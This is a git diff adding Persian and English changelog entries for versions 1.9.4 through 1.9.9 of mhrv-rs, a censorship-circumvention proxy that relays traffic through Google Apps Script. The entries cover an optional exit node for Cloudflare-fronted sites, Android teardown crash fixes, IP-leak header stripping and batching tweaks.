+• `youtube_via_relay` toggle in Android Advanced settings (PR [#535](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/535) by @yyoyoian-pixel, closes [#520](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/520)): the desktop UI has had a `youtube_via_relay` checkbox for a while, but the Android UI was missing it — Android users had to hand-edit `config.json` (which is rootful on Android). Now there's a Switch toggle in the Advanced settings section matching the desktop UI checkbox. Adds `youtubeViaRelay` field to `MhrvConfig` with JSON serialization (`youtube_via_relay` as the wire-format key), deserialization, and config-sharing encode. EN + FA string resources for label and helper text. Pure Android/Kotlin change; no Rust impact.
+• CI fix: `gh release download` in the Telegram publish workflow now uses `--clobber` so retries can survive partial downloads (no user impact, but the v1.9.2 release's Telegram channel publish failed because of this and required manual re-trigger).
diff --git a/docs/changelog/v1.9.4.md b/docs/changelog/v1.9.4.md
new file mode 100644
index 00000000..d7465015
--- /dev/null
+++ b/docs/changelog/v1.9.4.md
@@ -0,0 +1,26 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• exit node اختیاری برای دور زدن CF anti-bot روی ChatGPT / Claude / Grok / X (port از upstream [`masterking32/MasterHttpRelayVPN@464a6e1d`](https://github.com/masterking32/MasterHttpRelayVPN/commit/464a6e1d), با hardening): سایت‌های پشت Cloudflare مانند `chatgpt.com`، `claude.ai`، `grok.com`، `x.com`، `openai.com` traffic از Google datacenter IPs (Apps Script's outbound IP space) رو به‌عنوان bot flag می‌کنن + Turnstile / CAPTCHA / 502 challenge برمی‌گردونن. تا v1.9.3 این "Relay error: json: key must be a string at line 2 column 1" یا 502 generic می‌داد + هیچ workaround در apps_script mode نبود. حالا یک endpoint TypeScript کوچک (`assets/exit_node/exit_node.ts`) روی Deno Deploy / fly.io deploy می‌شه + بین Apps Script + destination قرار می‌گیره. مسیر traffic: `client → SNI rewrite → Apps Script (Google IP) → the exit node (non-Google IP) → destination`. destination IP exit node رو می‌بینه، نه Google datacenter — heuristic anti-bot CF نمی‌سوزه + صفحه واقعی برمی‌گرده. **leg user-side (Iran ISP → Apps Script) بدون تغییر** — second hop کاملاً درون outbound Apps Script اجرا می‌شه، invisible از شبکه‌ی کاربر. config جدید:
+```json
+"exit_node": {
+  "enabled": true,
+  "relay_url": "https://your-deployed-exit-node.example.com",
+  "psk": "<openssl rand -hex 32>",
+  "mode": "selective",
+  "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+}
+```
+دو mode: `selective` (default — فقط hosts مشخص از طریق exit node می‌رن) و `full` (همه می‌رن). در صورت failure exit node fallback اتومات به Apps Script direct (سایت‌های CF affected fail می‌گیرن، بقیه کار می‌کنن). hardening over upstream: PSK fail-closed اگر همچنان placeholder باشه (در fresh deploy نمی‌تونه به‌عنوان open relay accidentally سرو بشه)، loop guard (refuse fetch host خود)، 503 explicit برای misconfigured deploys. setup walkthrough در [`assets/exit_node/README.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.fa.md). config مثال در [`config.exit-node.example.json`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/config.exit-node.example.json).
+• حذف legacy `telegram` job در `release.yml` — قبلاً وقتی `TELEGRAM_NOTIFY_ENABLED` repo variable روی `true` set بود (در حال حاضر بود)، هر release **دو پست duplicate APK روی main channel** ایجاد می‌کرد: یکی قدیمی (universal APK + changelog) از release.yml و یکی جدید (cross-link به files channel) از telegram-publish-files.yml. فقط cross-link جدید رو می‌خواستیم. legacy job + helper script `.github/scripts/telegram_release_notify.py` حذف شدن. `telegram-publish-files.yml` (per-platform per-file posts با SHA-256 captions) تنها مسیر باقی مونده.
+---
+• Optional exit node to bypass CF anti-bot on ChatGPT / Claude / Grok / X (ported from upstream [`masterking32/MasterHttpRelayVPN@464a6e1d`](https://github.com/masterking32/MasterHttpRelayVPN/commit/464a6e1d), with hardening): Cloudflare-fronted services like `chatgpt.com`, `claude.ai`, `grok.com`, `x.com`, `openai.com` flag traffic from Google datacenter IPs (Apps Script's outbound IP space) as bots and return Turnstile / CAPTCHA / 502 challenges. Through v1.9.3 this surfaced as "Relay error: json: key must be a string at line 2 column 1" or generic 502 with no apps_script-mode workaround. Now a small TypeScript HTTP endpoint (`assets/exit_node/exit_node.ts`) deployed on Deno Deploy / fly.io sits between Apps Script and the destination. Traffic chain: `client → SNI rewrite → Apps Script (Google IP) → the exit node (non-Google IP) → destination`. The destination sees the exit node's IP, not Google datacenter — CF's anti-bot heuristic doesn't fire and the real page comes back. **The user-side leg (Iran ISP → Apps Script) is unchanged** — the second hop happens entirely inside Apps Script's outbound, invisible from the user's network, so the DPI evasion property mhrv-rs is built around stays intact. New config:
+```json
+"exit_node": {
+  "enabled": true,
+  "relay_url": "https://your-deployed-exit-node.example.com",
+  "psk": "<openssl rand -hex 32>",
+  "mode": "selective",
+  "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+}
+```
+Two modes: `selective` (default, only listed hosts route via exit node, recommended) or `full` (everything via exit node, slower). On exit-node failure, mhrv-rs falls back to direct Apps Script automatically — CF-affected sites fail in that case but everything else keeps working, so a down exit node doesn't take you fully offline. Hardening over upstream: PSK fail-closed if still the placeholder (fresh exit-node deploy can't accidentally serve as open relay until the user replaces the placeholder), loop guard (refuses to `fetch` its own host), explicit 503 on misconfigured deploys. Setup walkthrough in [`assets/exit_node/README.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.md) (English) and [`README.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.fa.md) (Persian). Complete example config at [`config.exit-node.example.json`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/config.exit-node.example.json).
+• Removed the legacy `telegram` job from `release.yml`. Previously, with the `TELEGRAM_NOTIFY_ENABLED` repo variable flipped to `true` (which it had been), every release produced **two duplicate APK posts on the main Telegram channel**: the old `release.yml` job (universal APK + bundled changelog) and the newer `telegram-publish-files.yml` workflow (per-platform per-file posts to the files channel + a single cross-link to the main channel). Only the cross-link was wanted. The legacy job and its helper script `.github/scripts/telegram_release_notify.py` are gone. `telegram-publish-files.yml` is now the only Telegram path. The legacy bundled-on-main pattern is recoverable from `git log` if anyone ever wants it back.
diff --git a/docs/changelog/v1.9.5.md b/docs/changelog/v1.9.5.md
new file mode 100644
index 00000000..2e77c597
--- /dev/null
+++ b/docs/changelog/v1.9.5.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• fix exit-node v1.9.4: مدارا با TLS ungraceful close (peer closed without close_notify) از سمت host exit-node ([#585](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/585) از @gregtheph): در v1.9.4، کاربری که exit node رو با درست‌ترین config setup کرد، در log می‌دید `WARN exit node failed for https://chatgpt.com/: io: peer closed connection without sending TLS close_notify — falling back to direct Apps Script` + سپس fallback به Apps Script که خود نمی‌تونه ChatGPT رو reach کنه، در نتیجه decoy/no-json error. علت: rustls سختگیر است درباره‌ی TLS shutdown — وقتی peer (the exit node) underlying TCP رو می‌بنده بدون اول send کردن TLS close_notify alert، rustls `io::ErrorKind::UnexpectedEof` می‌فرسته. کد ما در `read_http_response` این error رو propagate می‌کرد به‌عنوان hard error. حالا UnexpectedEof به‌صورت graceful EOF (مشابه `n == 0`) درمان می‌شه — اگر body completed شده با Content-Length، response درست برمی‌گرده. اگر mid-body close بود، error real (truncation) همچنان propagate می‌شه. ۴ regression test جدید (شامل UnexpectedEof tolerance + envelope unwrap exit_node). 173 lib tests + 33 tunnel-node tests pass.
+---
+• Fix v1.9.4 exit-node: tolerate ungraceful TLS close (peer closed without close_notify) on the exit-node path ([#585](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/585) by @gregtheph): in v1.9.4, users with a correctly-configured exit-node deployment saw `WARN exit node failed for https://chatgpt.com/: io: peer closed connection without sending TLS close_notify — falling back to direct Apps Script` in the log, followed by a fallback to direct Apps Script which can't reach ChatGPT either, resulting in the decoy/no-json error. Root cause: rustls is strict about TLS shutdown — when the peer (the exit-node's host) closes the underlying TCP without first sending a TLS close_notify alert, rustls surfaces this as `io::ErrorKind::UnexpectedEof`. Our code in `read_http_response` was propagating this as a hard error rather than treating it as graceful EOF. Now `UnexpectedEof` is handled like `n == 0`: if the body has been fully received per Content-Length, the response returns successfully; if it's a real mid-body truncation, the error still propagates as `BadResponse`. Same handling added to the chunked reader and the no-framing reader. Four regression tests cover the new behavior (UnexpectedEof tolerance for Content-Length and no-framing branches + exit-node envelope unwrap success and error paths). 173 lib tests + 33 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.6.md b/docs/changelog/v1.9.6.md
new file mode 100644
index 00000000..9cf6360b
--- /dev/null
+++ b/docs/changelog/v1.9.6.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Code.gs / CodeFull.gs hardening + باگ‌فیکس (هیچ تغییری در کانفیگ کاربر لازم نیست — فقط Code.gs خودتان را با [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (یا `CodeFull.gs` برای حالت full) جایگزین کنید + در Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Deployment ID همان قبلی می‌ماند):
+  - **`Code.gs` doGet تکراری حذف شد**: نسخه‌ای که با `HtmlService.createHtmlOutput` تعریف شده بود به‌خاطر hoisting جاوااسکریپت روی نسخهٔ صحیح `ContentService` overwrite می‌کرد. در نتیجه هر GET به URL deployment پاسخ سندباکس `goog.script.init` iframe برمی‌گرداند به‌جای HTML پلیس‌هولدر ساده. این برای ترافیک معمولی POST تأثیری نداشت ولی در زنجیرهٔ redirect که با GET پی می‌گیریم می‌توانست باگ ظاهر شود.
+  - **`CodeFull.gs` `doGet` به `ContentService` تغییر کرد** (قبلاً `HtmlService` بود) — به همان دلیل بالا.
+  - **هدرهای IP-leak در `SKIP_HEADERS` اضافه شد** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — در صورت misconfigured بودن یک پروکسی upstream سمت کاربر، IP واقعی کاربر دیگر در leg دوم سرور به مقصد نشت نمی‌کند. لایهٔ دفاع دوم به stripping سمت کلاینت v1.2.9 (#104).
+  - **`_doBatch` دارای fallback شد**: اگر `UrlFetchApp.fetchAll()` به‌عنوان یک کل throw کند (مثلاً یک URL بد همه را poison کند)، حالا برای متدهای امن (GET / HEAD / OPTIONS) per-item fetch می‌کند به‌جای صفر کردن کل پاسخ batch. port از `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (سمت Rust): unwrapper برای `goog.script.init("...userHtml...")` اضافه شد — اگر هر deployment‌ای پاسخ HtmlService-wrapped برگرداند (legacy Code.gs قبل از v1.9.6، یا redirect که doGet را GET بزند)، client حالا JSON داخلی را استخراج می‌کند به‌جای `key must be a string at line 2 column 1` fail کردن. در مقابل پاسخ doGet واقعی deployment کاربر تست شده — UTF-8 با `\xNN` byte-escape را درست decode می‌کند.
+• README بازنویسی شد: نسخهٔ کوتاه دوزبانه (انگلیسی + فارسی RTL) برای کاربر معمولی + راهنمای کامل پیشرفته در [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) و [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). جدا کردن "راه‌اندازی ۵ دقیقه‌ای" از "همهٔ گزینه‌ها و troubleshooting" راهنما را خیلی قابل‌فهم‌تر کرد، خصوصاً برای کاربرانی که می‌خواهند فقط شروع کنند.
+• تست: ۳ regression test جدید برای `extract_apps_script_user_html` + `decode_js_string_escapes` + `parse_relay_json` end-to-end. **۱۷۶ lib test + ۳۳ tunnel-node test همه pass.**
+---
+• Code.gs / CodeFull.gs hardening + bug fixes (no client config change needed — just replace your own Code.gs with [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (or `CodeFull.gs` for full mode) and in the Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Your Deployment ID stays the same):
+  - **Removed duplicate `doGet` in `Code.gs`**: a second copy declared with `HtmlService.createHtmlOutput` was silently overriding the correct `ContentService` one due to JS function hoisting. Result: every GET to the deployment URL was returning the `goog.script.init` sandbox iframe instead of the simple placeholder HTML. Did not affect normal POST traffic, but could surface during redirect chains we GET-follow.
+  - **`CodeFull.gs` `doGet` switched to `ContentService`** (was `HtmlService`) — same reason as above.
+  - **Added IP-leak headers to `SKIP_HEADERS`** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — if a misconfigured upstream proxy on the user side adds these, the user's real IP no longer leaks to the destination on the server-side leg. Second line of defense to v1.2.9's client-side stripping (#104).
+  - **`_doBatch` got a fallback path**: if `UrlFetchApp.fetchAll()` throws as a whole (e.g. one bad URL poisons the batch), it now per-item-fetches safe methods (GET / HEAD / OPTIONS) instead of zeroing the entire batch's responses. Ported from `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (Rust client): added unwrapper for `goog.script.init("...userHtml...")` iframe — if any deployment ever returns an HtmlService-wrapped response (legacy Code.gs prior to v1.9.6, or a redirect that GET-hits doGet), the client now extracts the inner JSON instead of failing with `key must be a string at line 2 column 1`. Tested against a real user deployment's actual doGet output — correctly decodes UTF-8 with `\xNN` byte-escapes.
+• Rewrote the README: short bilingual landing page (English + Persian RTL) for normal users, with the full advanced reference moved to [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) and [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). Splitting "5-minute quick start" from "every option + troubleshooting" makes the docs much more approachable, especially for users who just want to get running.
+• Tests: 3 new regression tests for `extract_apps_script_user_html` + `decode_js_string_escapes` + `parse_relay_json` end-to-end. **176 lib tests + 33 tunnel-node tests all passing.**
diff --git a/docs/changelog/v1.9.7.md b/docs/changelog/v1.9.7.md
new file mode 100644
index 00000000..54c4a96a
--- /dev/null
+++ b/docs/changelog/v1.9.7.md
@@ -0,0 +1,30 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• چک‌باکس **«Share with other devices on my Wi-Fi / network»** به UI دسکتاپ اضافه شد. به‌جای اینکه کاربر `listen_host` را به‌صورت دستی روی `0.0.0.0` تنظیم کند (که اکثر کاربران نمی‌دانستند)، حالا فقط یک چک‌باکس ساده روی فرم اصلی است. وقتی روشن می‌شود:
+  - Bind به‌طور خودکار به `0.0.0.0` تغییر می‌کند (تمام interfaceها)
+  - IP محلی شبکه‌ات با `detect_lan_ip()` تشخیص داده می‌شود (یک trick UDP `connect` که از kernel می‌پرسد source-IP outbound کدام است — هیچ ترافیک شبکه‌ای واقعی فرستاده نمی‌شود) و در زیر چک‌باکس همراه با پورت‌ها نمایش داده می‌شود تا بتوانی مستقیم به گوشی / لپ‌تاپ مهمان بدهی: `Other devices: HTTP 192.168.x.y:8085 · SOCKS5 192.168.x.y:8086`
+  - tooltip توضیح می‌دهد macOS اولین بار prompt firewall می‌اندازد
+  - اگر کاربر از قبل یک bind IP خاص (مثلاً `192.168.1.50` یک NIC مشخص) در `config.json` نوشته باشد، چک‌باکس قفل می‌شود + برچسب «Custom bind: 192.168.1.50» نشان می‌دهد تا تنظیم دستی توسط Save بعدی پاک نشود.
+  ماژول جدید `src/lan_utils.rs` با ۳ تست (تشخیص wildcard، تشخیص loopback، تست detect واقعی).
+• Code.gs / CodeFull.gs hardening + باگ‌فیکس (هیچ تغییری در کانفیگ کاربر لازم نیست — فقط Code.gs خودتان را با [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (یا `CodeFull.gs` برای حالت full) جایگزین کنید + در Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Deployment ID همان قبلی می‌ماند):
+  - **`Code.gs` doGet تکراری حذف شد**: نسخه‌ای که با `HtmlService.createHtmlOutput` تعریف شده بود به‌خاطر hoisting جاوااسکریپت روی نسخهٔ صحیح `ContentService` overwrite می‌کرد. در نتیجه هر GET به URL deployment پاسخ سندباکس `goog.script.init` iframe برمی‌گرداند به‌جای HTML پلیس‌هولدر ساده.
+  - **`CodeFull.gs` `doGet` به `ContentService` تغییر کرد** (قبلاً `HtmlService` بود) — به همان دلیل بالا.
+  - **هدرهای IP-leak در `SKIP_HEADERS` اضافه شد** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — لایهٔ دفاع دوم به stripping سمت کلاینت v1.2.9 (#104).
+  - **`_doBatch` دارای fallback شد**: اگر `UrlFetchApp.fetchAll()` به‌عنوان یک کل throw کند، حالا برای متدهای امن (GET / HEAD / OPTIONS) per-item fetch می‌کند به‌جای صفر کردن کل پاسخ batch. port از `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (سمت Rust): unwrapper برای `goog.script.init("...userHtml...")` اضافه شد — اگر هر deployment‌ای پاسخ HtmlService-wrapped برگرداند (legacy Code.gs قبل از v1.9.6، یا redirect که doGet را GET بزند)، client حالا JSON داخلی را استخراج می‌کند به‌جای fail کردن با `key must be a string at line 2 column 1`.
+• README بازنویسی شد: نسخهٔ کوتاه دوزبانه (انگلیسی + فارسی RTL) برای کاربر معمولی + راهنمای کامل پیشرفته در [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) و [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). جدا کردن "راه‌اندازی ۵ دقیقه‌ای" از "همهٔ گزینه‌ها و troubleshooting" راهنما را خیلی قابل‌فهم‌تر کرد. در guide.fa.md task list با `[x]` با جدول جایگزین شد چون رندر RTL در GitHub با چک‌باکس مارک‌داون خراب می‌شد.
+• تست: ۶ regression test جدید (۳ برای unwrap goog.script.init + ۳ برای lan_utils). **۱۷۹ lib test + ۳۳ tunnel-node test همه pass.**
+---
+• Added a **"Share with other devices on my Wi-Fi / network"** checkbox to the desktop UI. Instead of asking users to know they can set `listen_host` to `0.0.0.0` (which almost no one did), it's now a single checkbox on the main form. When enabled:
+  - Bind address auto-flips to `0.0.0.0` (all interfaces)
+  - Your LAN IP is detected via `detect_lan_ip()` (UDP `connect` trick — asks the kernel which source IP it would use for an outbound packet, no actual network traffic sent) and shown alongside the proxy ports so you can hand them to the guest device directly: `Other devices: HTTP 192.168.x.y:8085 · SOCKS5 192.168.x.y:8086`
+  - Tooltip explains macOS will pop a Firewall prompt the first time
+  - If you've already written a specific bind IP (e.g. `192.168.1.50` for one NIC) into `config.json`, the checkbox locks itself and shows a "Custom bind: 192.168.1.50" badge so the next Save can't clobber your manual setting.
+  New `src/lan_utils.rs` module with 3 unit tests (wildcard detection, loopback detection, live detect smoke).
+• Code.gs / CodeFull.gs hardening + bug fixes (no client config change needed — just replace your own Code.gs with [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (or `CodeFull.gs` for full mode) and in the Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Your Deployment ID stays the same):
+  - **Removed duplicate `doGet` in `Code.gs`**: a second copy declared with `HtmlService.createHtmlOutput` was silently overriding the correct `ContentService` one due to JS function hoisting. Result: every GET to the deployment URL was returning the `goog.script.init` sandbox iframe instead of the simple placeholder HTML.
+  - **`CodeFull.gs` `doGet` switched to `ContentService`** (was `HtmlService`) — same reason as above.
+  - **Added IP-leak headers to `SKIP_HEADERS`** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — second line of defense to v1.2.9's client-side stripping (#104).
+  - **`_doBatch` got a fallback path**: if `UrlFetchApp.fetchAll()` throws as a whole, it now per-item-fetches safe methods (GET / HEAD / OPTIONS) instead of zeroing the entire batch's responses. Ported from `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (Rust client): added unwrapper for `goog.script.init("...userHtml...")` iframe — if any deployment ever returns an HtmlService-wrapped response (legacy Code.gs, or a redirect that GET-hits doGet), the client now extracts the inner JSON instead of failing with `key must be a string at line 2 column 1`.
+• Rewrote the README: short bilingual landing page (English + Persian RTL) for normal users, with the full advanced reference moved to [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) and [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). Splitting "5-minute quick start" from "every option + troubleshooting" makes the docs much more approachable. In guide.fa.md the `[x]` task list was replaced with a table because GitHub's RTL renderer mangled the checkbox positions inside `<div dir="rtl">`.
+• Tests: 6 new regression tests (3 for goog.script.init unwrap + 3 for lan_utils). **179 lib tests + 33 tunnel-node tests all passing.**
diff --git a/docs/changelog/v1.9.8.md b/docs/changelog/v1.9.8.md
new file mode 100644
index 00000000..bbf652aa
--- /dev/null
+++ b/docs/changelog/v1.9.8.md
@@ -0,0 +1,14 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.7 Android: کرش روی tap Disconnect ([#666](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/666) از @ilok67 با root cause + fix کامل): `MainActivity.onStop` بعد از `startService(ACTION_STOP)` بلافاصله `stopService()` رو هم می‌زد. ACTION_STOP داخل `MhrvVpnService` یک thread پس‌زمینه به نام `mhrv-teardown` می‌سازه که `teardown()` (بستن tun2proxy، fd TUN، runtime) رو اجرا می‌کنه و در پایانش `stopSelf()` رو فرامی‌خونه. ولی `stopService()` بلافاصله `onDestroy()` رو روی همان service trigger می‌کرد — دو thread همزمان دارن از lifecycle می‌گذرن، و OS process service رو می‌کشه قبل از اینکه teardown تمام بشه. crash بعد از تب Disconnect، در حدود ۹۹٪ از تستها قابل reproduce. حالا `stopService()` حذف شده — `ACTION_STOP` تنها کافی است (هم برای service زنده هم برای حالت زامبی). idempotency guard `tornDown` AtomicBoolean قبلاً موجود بود ولی محافظت OS-level lifecycle race رو نمی‌کرد. تشکر از @ilok67 برای triage عالی.
+• Fix v1.9.7 UI: دکمهٔ Test Relay در حالت `full` (و `direct`) "test result: fail" قرمز نشون می‌داد ([#665](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/665) از @cmptrnb). `mhrv-rs test` فقط برای حالت apps_script سیم‌کشی شده — در `full` mode عمداً refuse می‌کنه چون probe مستقیم Apps Script در حالی که data plane از tunnel-node رد می‌شه گمراه‌کننده است. ولی پیام refuse توسط UI به‌عنوان test failure ترجمه می‌شد + کاربر فکر می‌کرد proxy خراب است. حالا UI mode رو قبل از اجرای test چک می‌کنه + برای حالت‌های نامناسب پیام explainer می‌ده به‌جای fail قرمز:
+> Test Relay is wired only for apps_script mode. In full mode the data plane is the tunnel-node — to verify it end-to-end, start the proxy and load https://whatismyipaddress.com in your browser via 127.0.0.1:8085. The IP shown should be your tunnel-node's VPS IP.
+
+- Tune adaptive batch coalesce (PR [#674](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/674) از @yyoyoian-pixel): از 40 ms → **10 ms** برای client coalesce step و tunnel-node straggler settle step. tunnel-node settle max از 500 ms → **1000 ms**. منطق asymmetric: وقتی هیچ op دیگری نیست، fast-fire (10 ms کافی برای catch کردن op‌هایی که در همان event-loop tick می‌رسن مثل ۶ موازی parallel browser connection)؛ ولی وقتی هر دو طرف data دارن (uploads، page load بستی)، adaptive reset همچنان batch می‌کنه تا 1 s cap. در short: «وقتی چیزی برای انتظار نیست منتظر نباش، وقتی هست با تمام توان batch کن.» سازگار به عقب: کاربران با `coalesce_step_ms: 40` در config.json رفتار قدیمی رو نگه می‌دارن.
+• تست: ۱۷۹ lib + ۳۳ tunnel-node test همه pass.
+---
+• Fix Android crash on tap-Disconnect from v1.9.7 ([#666](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/666) by @ilok67 with full root cause + fix): `MainActivity.onStop` was calling `stopService()` immediately after `startService(ACTION_STOP)`. ACTION_STOP inside `MhrvVpnService` spawns the `mhrv-teardown` background thread that runs `teardown()` (stops tun2proxy, closes TUN fd, shuts down the Rust runtime) and then calls `stopSelf()` at the end. But `stopService()` immediately triggered `onDestroy()` on the same service — two threads racing through the lifecycle, and the OS would kill the process before teardown finished. Crash on every Disconnect tap, ~99% reproducible. Removed the `stopService()` call — `ACTION_STOP` alone is sufficient for both the live-service and the zombie-after-process-death cases. The existing `tornDown` AtomicBoolean idempotency guard protects against double-teardown of native state, but it can't protect against OS-level lifecycle races on stopSelf vs stopService. Thanks @ilok67 for the precise triage.
+• Fix UI showing "test result: fail" red status for `full` (and `direct`) modes from v1.9.7 ([#665](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/665) by @cmptrnb). `mhrv-rs test` is wired only for the apps_script relay path — it deliberately refuses in `full` mode because probing Apps Script directly while the actual data plane goes via tunnel-node would give a misleading green result. But the refuse path was getting translated by the UI as a generic "test failed" with red status, scaring users into thinking their proxy was broken. Now the UI checks mode before running the test and shows a friendly explainer for `full`/`direct`:
+> Test Relay is wired only for apps_script mode. In full mode the data plane is the tunnel-node — to verify it end-to-end, start the proxy and load https://whatismyipaddress.com in your browser via 127.0.0.1:8085. The IP shown should be your tunnel-node's VPS IP.
+
+• Tune adaptive batch coalesce (PR [#674](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/674) from @yyoyoian-pixel): client coalesce step + tunnel-node straggler settle step from 40 ms → **10 ms**, tunnel-node settle max from 500 ms → **1000 ms**. The asymmetric design — small step, generous max — picks up "fire-and-forget when nothing else is queued" without giving up batching on bursts. The 10 ms still catches ops that arrive in the same event-loop tick (e.g. a browser opening 6 parallel connections on page load), so we don't degenerate into single-op batches; but on a download where the client is just waiting for the next chunk, the per-batch dead-air shrinks by ~30 ms. Backwards-compatible: existing configs with explicit `coalesce_step_ms: 40` keep the old behaviour.
+• Tests: 179 lib + 33 tunnel-node tests all passing.
diff --git a/docs/changelog/v1.9.9.md b/docs/changelog/v1.9.9.md
new file mode 100644
index 00000000..b2af4d5b
--- /dev/null
+++ b/docs/changelog/v1.9.9.md
@@ -0,0 +1,22 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.8 Android: کرش جدید ~۲ ثانیه بعد از Disconnect ([#700](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/700) از @ilok67 با root cause + fix کامل): علی‌رغم fix v1.9.8 برای race lifecycle (#666)، crash جداگانه در `MhrvVpnService.teardown()` باقی مانده بود. ترتیب قبلی: tun2proxy.stop → tun.close → join → Native.stopProxy. مشکل: tun2proxy worker thread در native code blocked روی socket read از SOCKS5 proxy است. وقتی Tun2proxy.stop کالد می‌شه + 2s timeout می‌گذره + 4s join timeout می‌گذره (worker هنوز alive)، Native.stopProxy runtime Rust رو shutdown می‌کنه شامل listener socket — worker thread که در native blocking read از همان socket است → use-after-free → SIGSEGV. comment کد قدیمی ادعا می‌کرد "runtime shutdown will knock the rest of the world over" که اشتباه بود — Native.stopProxy نمی‌تونه force-terminate یک thread native دیگه. ترتیب جدید: **Native.stopProxy اول** (socket رو می‌بنده → blocking read worker با error برمی‌گرده → worker پاک exit می‌کنه از error path)، بعد Tun2proxy.stop (cooperative، redundant ولی ارزان) → tun.close → join (تقریباً همیشه فوری چون worker از قبل تموم شده). تشکر بیشتر از @ilok67 برای triage دقیق دومین crash.
+• Fix tunnel-node batch drain correctness + lock contention (PR [#695](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/695) از @dazzling-no-more): چهار باگ، دو correctness، دو latency.
+  - **Cleanup race tail-bytes drop می‌کرد:** session با buffer > ۱۶ MiB + EOF — `drain_now` صحیح `eof=false` برمی‌گردوند تا tail tail رو در poll بعدی drain کنه، ولی cleanup loop همان atomic رو می‌خوند، `true` می‌دید + session رو حذف می‌کرد + `reader_task` رو abort + tail هدر می‌رفت. حالا cleanup از مقدار return `drain_now` پیروی می‌کنه — session فقط بعد از shipped شدن drain که `eof=true` می‌فرسته، حذف می‌شه. data loss silent در 1Gbps+ VPS که buffer بین poll‌ها پر می‌شد، fix شد.
+  - **Sessions-map lock روی upstream await نگه می‌داشت:** phase-1 `data` op global sessions map رو نگه می‌داشت روی `last_active.lock`، `writer.lock`، `write_all`، و `flush` — head-of-line-block برای هر batch + connect/close op دیگه. حالا (مثل `udp_data` که قبلاً درست بود) Arc از under map clone می‌شه، lock drop، بعد write/flush.
+  - **TCP+UDP batch deadline UDP رو می‌پرداخت:** `tokio::join!(wait_tcp, wait_udp)` conjunctive هست — TCP-ready burst هنوز LONGPOLL_DEADLINE 15 ثانیه‌ای UDP رو می‌پرداخت قبل از پاسخ. comment می‌گفت "either side"، code "both sides" انجام می‌داد. تغییر به `select!`. test جدید `batch_tcp_ready_does_not_pay_udp_longpoll_deadline` این رد رو حفظ می‌کنه.
